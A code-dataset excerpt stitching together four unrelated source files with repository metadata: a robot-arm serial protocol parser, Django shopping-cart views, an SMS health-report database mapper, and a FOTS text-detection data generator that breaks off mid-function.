e499c5885f41fbad43983182c64a49fb3142f5d2 | 13ec0c28352b255596e2a801ecb9d529eebc114b | /SerialTool/Robot.py | 57336b279cc4c3ae0d00ec74b2fce85cb07a81d0 | [] | no_license | yergen/SerialTool | cdd38ce8bc92020f3736f24b2d17fafac9d1fc07 | b068051ea939308030cf2dc37973127d7906470a | refs/heads/master | 2020-08-12T00:20:53.113814 | 2019-10-12T14:02:11 | 2019-10-12T14:02:11 | 214,568,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,395 | py | import struct
from datetime import datetime
class QxRobot(object):
def __init__(self):
#super(QxRobot, self).__init__(parent)
self.initVariable()
def initVariable(self):
self.jointVersion = 0
self.multiple = 0
self.errorLog = []
self.lastID = 255
self.joint0 = []
self.joint1 = []
self.joint2 = []
self.joint3 = []
self.joint4 = []
self.joint5 = []
self.joint6 = []
self.allJoint = {"基座":self.joint0, "肩部":self.joint1, "肘部":self.joint2,
"手腕1":self.joint3, "手腕2":self.joint4, "手腕3":self.joint5, "工具板":self.joint6}
#数据解析
def dataProcess(self, receiveBuffer):
if len(receiveBuffer) >3:
ID = receiveBuffer[1]#获取关节ID
if self.checkCRC(receiveBuffer):#校验CRC
if ID <= self.lastID and self.lastID != 255 and self.multiple:
self.error(38, ID-self.lastID)
else:
if ID >=0+ self.jointVersion and ID <= 6+self.jointVersion:
if ID == 6+self.jointVersion:
self.lastID = 255
else:
self.lastID = ID
self.jointModeProcess(receiveBuffer[1:-2])
else:
self.error(30, ID)
else:
self.error(44, ID)
#数据打包
#sendBuffer:为一个列表,索引值的数据是相应关节和工具板的数据。
def dataPack(self, sendBuffer):
data = b''
for i in range(7):
data += sendBuffer[i]
dataLength = struct.pack('B', len(data)+1)
no_CRCData = dataLength + data
CRCData = self.generateCRC(no_CRCData)
return CRCData
#将接收到的关节数据根据不同的工作模式进行解包
def jointModeProcess(self, buffer):
joint_ID = buffer[0]
workMode = buffer[1]
tempForm = {}
if joint_ID != 0x06+self.jointVersion:
if workMode == 0x00:
self.error(buffer[2], buffer[3])
ID, Mode, Code, Msg = struct.unpack('>4B', buffer)#>:大端 B:无符号char
tempForm = {"jointID": ID,"workMode":Mode, "errorCode":Code, "errorMsg":Msg}
elif workMode == 0x8C:
ID, Mode, End = struct.unpack('>2BH', buffer)
tempForm = {"jointID": ID,"workMode":Mode, "endAddress":End}
elif workMode == 0x94:
ID, Mode, Cycle, L_Pos = struct.unpack('>2BlH', buffer)
tempForm = {"jointID": ID,"workMode":Mode, "Cycle":Cycle, "lastPos":L_Pos}
elif workMode == 0xFD:
ID, Mode, Pos, Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2BL3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos,"jointSpeed":SpeedValue,
"jointCur":Cur,"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFB:
ID, Mode, Pos, Cur, GearMax, Gear, Sensor = struct.unpack('>2BLhlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF3:
ID, Mode, Pos, Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2BL3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos,"jointSpeed":SpeedValue,
"jointCur":Cur,"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFF:
ID, Mode, GearMax, Gear, Sensor = struct.unpack('>2BlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF6:
ID, Mode, GearMax, Gear, Sensor = struct.unpack('>2BlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFE:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xED:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF0:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xEE:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF7:
if len(buffer) == 0x0E-3:
ID, Mode, AddIndex, FlashData = struct.unpack('>3B8s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "addIndex":AddIndex, "flashData":FlashData}
elif len(buffer) == 0x0A-3:
ID, Mode, AddIndex, FlashData = struct.unpack('>3B4s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "addIndex":AddIndex, "flashData":FlashData}
else:
if workMode == 0xFD:#只处理运行模式数据,其他都舍弃。
ID, Mode, Others = struct.unpack('>2B14s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "others":Others}
#将解析完的数据进行存储
if len(tempForm) != 0:
if tempForm["jointID"] == 0x00 + self.jointVersion:
self.joint0.append(tempForm)
elif tempForm["jointID"] == 0x01 + self.jointVersion:
self.joint1.append(tempForm)
elif tempForm["jointID"] == 0x02 + self.jointVersion:
self.joint2.append(tempForm)
elif tempForm["jointID"] == 0x03 + self.jointVersion:
self.joint3.append(tempForm)
elif tempForm["jointID"] == 0x04 + self.jointVersion:
self.joint4.append(tempForm)
elif tempForm["jointID"] == 0x05 + self.jointVersion:
self.joint5.append(tempForm)
elif tempForm["jointID"] == 0x06 + self.jointVersion:
self.joint6.append(tempForm)
#print(tempForm)
#速度的特殊格式处理
def speedProcess(self, Speed):
if Speed[0] & 0x80:
tempSpeed = b'\xFF' + Speed
else:
tempSpeed = b'\x00' + Speed
speedValue, = struct.unpack('>l', tempSpeed)#speedValue,逗号必须添加。否则返回tuple类型
return speedValue
#在数据最后打包CRC
def generateCRC(self, sendBuffer):
tempBuffer = bytearray(sendBuffer[0]+2)#新建bytearray类型,sendBuffer[0]+2大小的变量
for i in range(len(sendBuffer)):
tempBuffer[i] = sendBuffer[i]
temp = 0x0000
#sendBuffer[0] = sendBuffer[0] + 2 #error: 字节流数组是不可修改的
tempBuffer[0] += 2 #bytearray可以修改
for d in tempBuffer[:-2]:
temp = self.calculateCrc(temp, d)
tempBuffer[-2] = temp &0xff
tempBuffer[-1] = temp>>8
return tempBuffer
#CRC校验
def checkCRC(self, receiveBuffer):
temp = 0x0000
for d in receiveBuffer:
temp = self.calculateCrc(temp, d)
return 1 if temp == 0 else 0
#计算要生成的CRC
def calculateCrc(self, crc, data):
data=(data^(crc&0xff))
data=data^(data << 4&0xff)
return (((data<<8)|((crc>>8)&0xff))^(data>>4))^(data<<3)
#错误日志
def error(self, code, message):
time = datetime.now()
self.errorLog.append({"time":time,"code":code, "mes":message})
#机械臂开、启动发送数据
def robotOpenData(self, text):
data = []
if text == "开":
for i in range(6):
data.append(b'\x02\x82')
data.append(b'\x03\x95\x40')
elif text == "启动":
for i in range(6):
data.append(b'\x02\x84')
data.append(b'\x03\x95\x40')
return data
#机械臂关闭发送数据
def robotCloseData(self):
data = []
for i in range(6):
data.append(b'\x02\x82')
data.append(b'\x03\x95\x40')
return data
#单轴关节旋转
def pressedJointMoveData(self, MoveJoint):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
if MoveJoint >0 and MoveJoint <= 3:
data[MoveJoint-1] = b'\x07\x0A\x00\x1F\xAE\x00\x00'
elif MoveJoint >3 and MoveJoint <= 6:
data[MoveJoint -1] = b'\x07\x0A\x00\x10\xE5\x00\x00'
elif MoveJoint <0 and MoveJoint >= -3:
data[abs(MoveJoint)-1] = b'\x07\x0A\xFF\xE0\x52\x00\x00'
elif MoveJoint <-3 and MoveJoint >= -6:
data[abs(MoveJoint)-1] = b'\x07\x0A\xFF\xEF\x1B\x00\x00'
return data
def releaseJointMoveData(self):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
return data
def singleRotateData(self, jointID, jointSpeed):
data = []
speed = b''
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
if jointID >= 0 and jointID < 3:
speed = struct.pack('>l', int(jointSpeed/0.0123291015625))[-3:]
elif jointID >= 3 and jointID < 6:
speed = struct.pack('>l', int(jointSpeed/0.02311706543))[-3:]
if speed != b'':
data[jointID] = b'\x07\x0A' + speed + b'\x00\x00'
return data
def stopSingleRotateData(self):
data = []
for i in range(6):
data.append(b'\x07\x0A\x00\x00\x00\x00\x00')
data.append(b'\x03\x95\x40')
return data
if __name__ == '__main__':
Rb = QxRobot()
recData = b'\x12\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x03\x95\x40\x71\x01'
transData = b'\x10\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x02\x82\x03\x95\x40'
recData = b'\x07\xFD\x2C\xD8\xDD\x63\xF1\x83\x84\x04\x10\x00\x00\x19\x63\x05\xD3\x5B'
# 48 0B 0B 29 53 79 B7 01 A4 80 05 02 0B 0B 00 00 00 00 00 00 00 FE DB 0B 0B 00 00 00 00 00 00 00 00 8E
# 0B 0B 00 00 00 00 00 00 00 FF C5 0B 0B 00 00 00 00 00 00 00 00 53 0B 0B 00 00 00 00 00 00 00 00 00
# 03 95 40 ED 03
sendBuffer = [ b'\x0B\x0B\x29\x53\x79\xB7\x01\xA4\x80\x05\x02',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\xFE\xDB',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x8E',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\xFF\xC5',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x53',
b'\x0B\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x03\x95\x40']
| [
"15010908626@163.com"
] | 15010908626@163.com |
ec3fd1acc220ef26c9dbc5e7a9ecd28e583e257d | 915f1c80b6b420926f337e2090ba50f91f7b9534 | /carts/views.py | ebee412dff143108136058b0d204570e782ed9b5 | [] | no_license | Paccy10/greatkart-django | 32f32a7f202c25b26abf37094b25bebf4f507261 | 51b8cb1f8303acb93cbd139c1d3fa93bdff3c093 | refs/heads/main | 2023-06-14T21:58:16.493382 | 2021-07-10T10:06:17 | 2021-07-10T10:06:17 | 378,876,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,155 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from store.models import Product, ProductVariation
from .models import Cart, CartItem
def cart(request, total=0, quantity=0, cart_items=None):
tax = 0
grand_total = 0
try:
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += cart_item.product.price * cart_item.quantity
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total
}
return render(request, 'store/cart.html', context)
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
current_user = request.user
product = Product.objects.get(id=product_id)
if current_user.is_authenticated:
product_variations = []
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = ProductVariation.objects.get(
variation__product=product, variation__name__iexact=key, value__iexact=value)
product_variations.append(variation)
except:
pass
is_cart_item_exists = CartItem.objects.filter(
product=product, user=current_user).exists()
if is_cart_item_exists:
cart_items = CartItem.objects.filter(
product=product, user=current_user)
ex_var_list = []
items_ids = []
for item in cart_items:
ex_var_list.append(list(item.variations.all()))
items_ids.append(item.id)
if product_variations in ex_var_list:
index = ex_var_list.index(product_variations)
item_id = items_ids[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(
product=product, quantity=1, user=current_user)
if len(product_variations) > 0:
item.variations.clear()
item.variations.add(*product_variations)
item.save()
else:
cart_item = CartItem.objects.create(
product=product, user=current_user, quantity=1)
if len(product_variations) > 0:
cart_item.variations.add(*product_variations)
cart_item.save()
return redirect('cart')
else:
product_variations = []
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = ProductVariation.objects.get(
variation__product=product, variation__name__iexact=key, value__iexact=value)
product_variations.append(variation)
except:
pass
try:
cart = Cart.objects.get(cart_id=_cart_id(request))
except Cart.DoesNotExist:
cart = Cart.objects.create(cart_id=_cart_id(request))
cart.save()
is_cart_item_exists = CartItem.objects.filter(
product=product, cart=cart).exists()
if is_cart_item_exists:
cart_items = CartItem.objects.filter(
product=product, cart=cart)
ex_var_list = []
items_ids = []
for item in cart_items:
ex_var_list.append(list(item.variations.all()))
items_ids.append(item.id)
if product_variations in ex_var_list:
index = ex_var_list.index(product_variations)
item_id = items_ids[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(
product=product, quantity=1, cart=cart)
if len(product_variations) > 0:
item.variations.clear()
item.variations.add(*product_variations)
item.save()
else:
cart_item = CartItem.objects.create(
product=product, cart=cart, quantity=1)
if len(product_variations) > 0:
cart_item.variations.add(*product_variations)
cart_item.save()
return redirect('cart')
def remove_cart(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
try:
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
if cart_item.quantity > 1:
cart_item.quantity -= 1
cart_item.save()
else:
cart_item.delete()
except:
pass
return redirect('cart')
def remove_cart_item(request, product_id, cart_item_id):
product = get_object_or_404(Product, id=product_id)
if request.user.is_authenticated:
cart_item = CartItem.objects.get(
product=product, user=request.user, id=cart_item_id)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(
product=product, cart=cart, id=cart_item_id)
cart_item.delete()
return redirect('cart')
@login_required(login_url='login')
def checkout(request, total=0, quantity=0, cart_items=None):
tax = 0
grand_total = 0
try:
if request.user.is_authenticated:
cart_items = CartItem.objects.filter(
user=request.user, is_active=True)
else:
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += cart_item.product.price * cart_item.quantity
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total
}
return render(request, 'store/checkout.html', context)
| [
"pacifiqueclement@gmail.com"
] | pacifiqueclement@gmail.com |
ed7864fbc5faf9d58d3816537dbd833787832756 | fa124fdbf36327bf8e74bbc7f00ce448c1e7939a | /src/com/rwanda/mch/sms/api/messaging/zdmapper/mappers/cmrmapper.py | f97e94e932dc69ab661619c309d6cd2f1afa6449 | [] | no_license | pivotaccess2007/mch | 039f17cdb16b434c0a25504cc81b7db81e5da988 | 523d1cd706296744e17e85683b5dbedbc05dd9e6 | refs/heads/master | 2020-03-30T16:33:44.451275 | 2018-10-03T13:23:00 | 2018-10-03T13:23:00 | 151,414,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,019 | py | # vim: ai ts=4 sts=4 et sw=4
##
##
## @author UWANTWALI ZIGAMA Didier
## d.zigama@pivotaccess.com/zigdidier@gmail.com
##
from model.ccm import CCM
from sms.api.messaging.zdmapper.mappers.childmapper import Childmapper
from sms.api.messaging.zdmapper.mappers.ccmmapper import CCMmapper
import datetime
class CMRmapper(object):
""" CMR map the sms report appropriately to db columns structure """
def __init__(self, report):
self.cmr = CCM(report.nid, report.birth_date, report.child_number)
self.cmr.table = self.cmr.table2
self.__dict__.update(report.__dict__)
self.FIELDS = {}
self.child = Childmapper(report)
self.ccmmapper = CCMmapper(report)
def get_unique_query(self):
try:
self.child_pk = getattr(self, 'child_pk') if hasattr(self, 'child_pk') else None
self.ccm_pk = getattr(self, 'report_pk') if hasattr(self, 'report_pk') else None
self.curr_symptom_dict = {
'symptom_ib': self.codes(self.current_symptoms, 'ib'),
'symptom_db': self.codes(self.current_symptoms, 'db'),
'symptom_di': self.codes(self.current_symptoms, 'di'),
'symptom_ma': self.codes(self.current_symptoms, 'ma'),
'symptom_np': self.codes(self.current_symptoms, 'np'),
'symptom_oi': self.codes(self.current_symptoms, 'oi'),
'symptom_pc': self.codes(self.current_symptoms, 'pc'),
'symptom_nv': self.codes(self.current_symptoms, 'nv'),
}
self.UNIQUE_QUERY = self.filters_of_dict_keys(self.curr_symptom_dict)
self.UNIQUE_QUERY.update( {"child_pk = %s": self.child_pk })
if self.ccm_pk: self.UNIQUE_QUERY.update( {"ccm_pk = %s": self.ccm_pk })
except Exception, e:
print "UNIQUE CMR: %s" % e
return self
def get_fields(self):
try:
child = self.child.store()
self.child_pk = child.indexcol
self.mother_pk = child.mother_pk
self.pregnancy_pk = child.pregnancy_pk
self.health_status = getattr(self, 'child_status') if hasattr(self, 'child_status') else None
self.ccm_pk = getattr(self, 'report_pk') if hasattr(self, 'report_pk') else None
indexcol = None
self.get_unique_query()
#print self.UNIQUE_QUERY
cmr = self.cmr.get_cmr(self.UNIQUE_QUERY)
if cmr:
indexcol = cmr.indexcol
self.created_at = cmr.created_at
self.FIELDS.update(self.curr_symptom_dict)
self.FIELDS.update( {
'indexcol' : indexcol,
'created_at' : self.created_at,
'updated_at' : self.updated_at,
'national_id' : self.national_id,
'mother_pk': self.mother_pk,
'user_phone' : self.user_phone,
'user_pk' : self.user_pk,
'role_pk' : self.role_pk,
'nation_pk' : self.nation_pk,
'province_pk' : self.province_pk,
'district_pk' : self.district_pk,
'referral_facility_pk' : self.referral_facility_pk,
'facility_pk' : self.facility_pk,
'sector_pk' : self.sector_pk,
'cell_pk' : self.cell_pk,
'village_pk' : self.village_pk,
'birth_date' : self.birth_date,
'child_number' : self.child_number,
'pregnancy_pk' : self.pregnancy_pk,
'child_pk': self.child_pk,
'ccm_pk': self.ccm_pk,
'intervention': self.code(self.intervention),
'health_status': self.code(self.health_status),
'message' : self.message.text,
'is_valid': True
}
)
#print self.FIELDS
except Exception, e:
print "FIELDS CMR: %s" % e
pass
return self
def store(self):
try:
cmr = self.cmr.save_cmr(self.orm, self.get_fields())
return cmr
except Exception, e:
print "STORE CMR: %s" % e
pass
return None
| [
"zigdidier@gmail.com"
] | zigdidier@gmail.com |
3ac9d236c7a52f4c921b2b75b6a80d93ee63834b | e38c5c8d9a0ae12be0ca755720b7bad54bddf457 | /DataGenerator.py | 8d1475b20b65bb2be0d5d7ecefd6f1a3a40087cd | [] | no_license | Amlan-Gopal/fots | 0d242f4e166c9781695ee1534f2cd72b56c65870 | bff6fe258a46375831554262cad54dd9106d1141 | refs/heads/main | 2023-06-10T09:42:15.019113 | 2021-06-26T13:00:43 | 2021-06-26T13:00:43 | 380,490,450 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,730 | py | # Imports
import numpy as np
import os
import scipy.io
import glob
from tqdm import tqdm
import random
import pandas as pd
import pickle
import cv2
import time
import scipy.optimize
from shapely.geometry import Polygon
import tensorflow as tf
import math
import traceback
import warnings
warnings.filterwarnings("ignore")
#get_ipython().system('pip install Shapely')
# References
# https://github.com/jiangxiluning/FOTS.PyTorch/tree/master/FOTS
# https://github.com/Masao-Taketani/FOTS_OCR
class DataGenerator:
def __loadSynthImages(self):
"""Returns SynthText directory files"""
files = []
for root,dirs,file in os.walk('SampleSynth',topdown=True):
for i in file:
extn = i.split('.')[-1]
if extn != 'DS_Store' and extn!= 'mat':
path = root+os.sep+i
path = '/'.join(path.split('\\'))
files.append(path)
return files
def __loadICDARImages(self):
"""Returns ICDAR directory files"""
files = []
root = 'ch4_training_images'
for f in os.listdir(root):
files.append(root + '/' + f)
return files
def __loadAllSynthGT(self):
"""Loads gt.mat (Ground Truth values) and returns dictinary containing image path,
bounding box cordinates and contained text"""
with open('SampleSynth/synth_gt.txt', 'rb') as f:
data = f.read()
synth_gt = pickle.loads(data)
return synth_gt
def __loadGT_Synth(self, imgPath, synth_dict= {}):
"""For a given Synth image path, it returns the bounding box cordinates and texts"""
# Check the dictinary
if len(synth_dict) == 0:
raise Exception('Synth GT is empty!!')
else:
# Collect bounding box cordinates and texts for a given index
if imgPath in synth_dict['imname']:
index = synth_dict['imname'].index(imgPath)
bboxes = synth_dict['wordBB'][index]
texts = synth_dict['txt'][index]
_, _, numOfWords = bboxes.shape
# Change shape from (2, 4, number of boxes) to (number of boxes, 4, 2)
bboxes = bboxes.reshape([8, numOfWords], order = 'F').T # num_words * 8
bboxes = bboxes.reshape(numOfWords, 4, 2) # num_of_words * 4 * 2
texts = np.array([word for line in texts for word in line.split()])
return bboxes, texts
return None, None
def __textTagsCounts_ICDAR(self):
"""It will return count of all the texts in the data"""
textTags = []
for file in os.listdir('ch4_training_localization_transcription_gt'):
path = 'ch4_training_localization_transcription_gt' + '/' + file
with open(path, 'r', encoding='utf-8-sig') as f:
# Split the lines for each bouning box
lines = f.read().split('\n')
texts = [''.join(line.split(',')[8:]) for line in lines if line]
# Check for invalid texts
textTags.extend([word for line in texts for word in line.split() if not (word == '*' or word == '###')])
return len(set(textTags))
def __loadGT_ICDAR(self, imgPath):
    """For a given ICDAR image path, return bounding boxes and texts.

    :param imgPath: path to an ICDAR training image; its ground-truth
        file is 'ch4_training_localization_transcription_gt/gt_<stem>.txt'.
    :return: (bboxes (N, 4, 2) float32 array, texts array; unreadable
             words ('*' or '###') become None).
    """
    # Derive the ground-truth file name from the image file name.
    # BUGFIX: the old code replaced the substring 'jpg'/'png'/'jpeg'
    # anywhere in the name, corrupting names that happen to contain it;
    # replace only the real extension instead.
    base = imgPath.split('/')[-1]
    stem = base.rsplit('.', 1)[0]
    path = 'ch4_training_localization_transcription_gt/gt_' + stem + '.txt'
    with open(path, 'r', encoding='utf-8-sig') as f:
        # Split the lines for each bounding box
        lines = f.read().split('\n')
    # Get coordinate values and convert them to (4, 2) shapes each
    bboxes = []
    bbox_cords = [line.split(',')[:8] for line in lines if line]
    for bbox_cord in bbox_cords:
        x1, y1, x2, y2, x3, y3, x4, y4 = bbox_cord
        bboxes.append([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])
    # Extract text: everything after the 8 coordinates
    texts = [''.join(line.split(',')[8:]) for line in lines if line]
    # Invalid texts are flagged with None
    texts = [None if (word == '*' or word == '###') else word
             for line in texts for word in line.split()]
    return np.array(bboxes, dtype=np.float32), np.array(texts)
def __polygon_area(self, poly):
    """Signed area of a quadrilateral (shoelace formula).

    The sign encodes the vertex order in image coordinates; the caller
    uses it to detect and fix wrongly-ordered polygons.
    """
    total = 0.0
    for i in range(4):
        x0, y0 = poly[i][0], poly[i][1]
        x1, y1 = poly[(i + 1) % 4][0], poly[(i + 1) % 4][1]
        total += (x1 - x0) * (y1 + y0)
    return total / 2
def __check_and_validate_polys(self, polys, tags, h_w):
    """Clip polygons to the image and drop degenerate ones.

    :param polys: (N, 4, 2) text polygons (modified in place by clipping).
    :param tags: the N transcriptions matching the polygons.
    :param h_w: (height, width) of the image.
    :return: (valid_polys, valid_tags) as numpy arrays.
    """
    (h, w) = h_w
    if polys.shape[0] == 0:
        # BUGFIX: return a (polys, tags) pair so callers can always
        # unpack two values (the old code returned only `polys`).
        return polys, tags
    # Clip coordinates to the image bounds
    polys[:, :, 0] = np.clip(polys[:, :, 0], 0, w - 1)
    polys[:, :, 1] = np.clip(polys[:, :, 1], 0, h - 1)
    validated_polys = []
    validated_tags = []
    for poly, tag in zip(polys, tags):
        p_area = self.__polygon_area(poly)
        if abs(p_area) < 1:
            # degenerate (near-zero area) polygon
            continue
        if p_area > 0:
            # wrong vertex order -> reverse into the expected order
            poly = poly[(0, 3, 2, 1), :]
        validated_polys.append(poly)
        validated_tags.append(tag)
    return np.array(validated_polys), np.array(validated_tags)
def __shrink_poly(self, poly, r):
    """Shrink a quadrilateral inwards to build the score-map region.

    Each vertex is moved along its two incident edges by R * r[i],
    where r[i] is the shorter adjacent-edge length for vertex i
    (computed by the caller).  The longer edge pair is shrunk first so
    that thin text boxes do not collapse.

    :param poly: (4, 2) array of vertices; modified in place.
    :param r: per-vertex reference lengths (length 4).
    :return: the shrunk polygon (same array as `poly`).
    """
    R = 0.3  # shrink ratio
    # find the longer pair of opposite edges
    if np.linalg.norm(poly[0] - poly[1]) + np.linalg.norm(poly[2] - poly[3]) > np.linalg.norm(poly[0] - poly[3]) + np.linalg.norm(poly[1] - poly[2]):
        # first move (p0, p1), (p2, p3), then (p0, p3), (p1, p2)
        ## p0, p1: move both ends of the edge towards each other
        theta = np.arctan2((poly[1][1] - poly[0][1]), (poly[1][0] - poly[0][0]))
        poly[0][0] += R * r[0] * np.cos(theta)
        poly[0][1] += R * r[0] * np.sin(theta)
        poly[1][0] -= R * r[1] * np.cos(theta)
        poly[1][1] -= R * r[1] * np.sin(theta)
        ## p2, p3
        theta = np.arctan2((poly[2][1] - poly[3][1]), (poly[2][0] - poly[3][0]))
        poly[3][0] += R * r[3] * np.cos(theta)
        poly[3][1] += R * r[3] * np.sin(theta)
        poly[2][0] -= R * r[2] * np.cos(theta)
        poly[2][1] -= R * r[2] * np.sin(theta)
        ## p0, p3 (note: arctan2(dx, dy), so cos/sin are swapped below)
        theta = np.arctan2((poly[3][0] - poly[0][0]), (poly[3][1] - poly[0][1]))
        poly[0][0] += R * r[0] * np.sin(theta)
        poly[0][1] += R * r[0] * np.cos(theta)
        poly[3][0] -= R * r[3] * np.sin(theta)
        poly[3][1] -= R * r[3] * np.cos(theta)
        ## p1, p2
        theta = np.arctan2((poly[2][0] - poly[1][0]), (poly[2][1] - poly[1][1]))
        poly[1][0] += R * r[1] * np.sin(theta)
        poly[1][1] += R * r[1] * np.cos(theta)
        poly[2][0] -= R * r[2] * np.sin(theta)
        poly[2][1] -= R * r[2] * np.cos(theta)
    else:
        # the other edge pair is longer: shrink (p0, p3), (p1, p2) first
        ## p0, p3
        theta = np.arctan2((poly[3][0] - poly[0][0]), (poly[3][1] - poly[0][1]))
        poly[0][0] += R * r[0] * np.sin(theta)
        poly[0][1] += R * r[0] * np.cos(theta)
        poly[3][0] -= R * r[3] * np.sin(theta)
        poly[3][1] -= R * r[3] * np.cos(theta)
        ## p1, p2
        theta = np.arctan2((poly[2][0] - poly[1][0]), (poly[2][1] - poly[1][1]))
        poly[1][0] += R * r[1] * np.sin(theta)
        poly[1][1] += R * r[1] * np.cos(theta)
        poly[2][0] -= R * r[2] * np.sin(theta)
        poly[2][1] -= R * r[2] * np.cos(theta)
        ## p0, p1
        theta = np.arctan2((poly[1][1] - poly[0][1]), (poly[1][0] - poly[0][0]))
        poly[0][0] += R * r[0] * np.cos(theta)
        poly[0][1] += R * r[0] * np.sin(theta)
        poly[1][0] -= R * r[1] * np.cos(theta)
        poly[1][1] -= R * r[1] * np.sin(theta)
        ## p2, p3
        theta = np.arctan2((poly[2][1] - poly[3][1]), (poly[2][0] - poly[3][0]))
        poly[3][0] += R * r[3] * np.cos(theta)
        poly[3][1] += R * r[3] * np.sin(theta)
        poly[2][0] -= R * r[2] * np.cos(theta)
        poly[2][1] -= R * r[2] * np.sin(theta)
    return poly
def __point_dist_to_line(self, p1, p2, p3):
    """Perpendicular distance from point p3 to the line through p1 and p2."""
    direction = p2 - p1
    return np.linalg.norm(np.cross(direction, p1 - p3)) / np.linalg.norm(direction)
def __fit_line(self, p1, p2):
    """Fit a line a*x + b*y + c = 0 through two points.

    NOTE on the convention: p1 holds the two x-coordinates [x1, x2] and
    p2 the two y-coordinates [y1, y2] (they are NOT two points).
    Vertical lines are returned as [1., 0., -x]; all others as
    [k, -1., b], i.e. y = k*x + b.
    """
    if p1[0] == p1[1]:
        # both x-coordinates equal -> vertical line x = p1[0]
        return [1., 0., -p1[0]]
    else:
        [k, b] = np.polyfit(p1, p2, deg=1)
        return [k, -1., b]
def __line_cross_point(self, line1, line2):
    """Return the intersection point of line1 and line2.

    Lines use the __fit_line convention: vertical lines are
    [1, 0, -x]; all others are [k, -1, b] meaning y = k*x + b.
    Returns None for parallel lines.
    """
    if line1[0] != 0 and line1[0] == line2[0]:
        # equal non-zero slopes -> parallel
        print('Cross point does not exist')
        return None
    if line1[0] == 0 and line2[0] == 0:
        # both horizontal -> parallel
        print('Cross point does not exist')
        return None
    if line1[1] == 0:
        # line1 is vertical: x is fixed, evaluate line2 at that x
        x = -line1[2]
        y = line2[0] * x + line2[2]
